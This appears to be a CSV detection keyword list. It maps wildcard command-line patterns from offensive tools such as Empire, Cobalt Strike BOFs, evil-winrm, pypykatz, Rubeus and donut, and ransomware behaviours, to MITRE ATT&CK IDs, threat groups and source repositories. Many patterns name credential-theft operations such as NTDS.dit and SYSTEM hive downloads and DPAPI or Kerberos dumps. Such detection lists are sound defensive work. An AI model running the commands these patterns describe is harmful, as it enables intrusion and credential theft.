run*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" +"* domcon-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* domcon-cmd.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dome.py*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"* domino-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -DoNotPersistImmediately *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --dont-enumerate-acls *","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"* --dont-enumerate-acls * -e *","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"* --donut --rehash n --silent -o /tmp/*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* donut.c *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* donut.exe *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* donut.o *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* --dotnetassembly * --amsi*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"* --dotnetassembly * --appdomain *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"* --dotnetassembly * --assemblyargs *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run 
execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"* --dotnetassembly * --mailslot*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"* --dotnetassembly * --pipe *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"* -Downgrade False -Restore False -Impersonate True * -challange *","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","0","N/A","N/A","10","1283","243","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" +"* download *\NTDS\NTDS.dit*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"* download *\Windows\System32\config\SYSTEM*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. 
A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"* dpap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dpapi blob *.json *.dat*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* dpapi credential *.json cred*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* dpapi masterkey /root/*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* dpapi minidump *.dmp*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* dpapi prekey nt *S-1-5-21*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* dpapi prekey password 
*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* dpapi prekey registry *.reg*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* dpapi securestring *.dat*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* dpipe.sh*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","0","N/A","N/A","1","55","28","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z" +"* --drag-and-drop*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* DraytekScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* drda-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* drda-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* DriverName *Xeroxxx*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --drop-drag-and-drop-target*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* dropping source port zero packet from *","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","greyware tool - risks of False positive 
!","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
+"* dump * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"* dump --bucket *--dump-dir*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z"
+"* dump_memory64*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","0","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z"
+"* --dump-adcs*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z"
+"* -DumpCerts *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - 
Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* -DumpCreds *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* dumper.ps1*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - 
TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z"
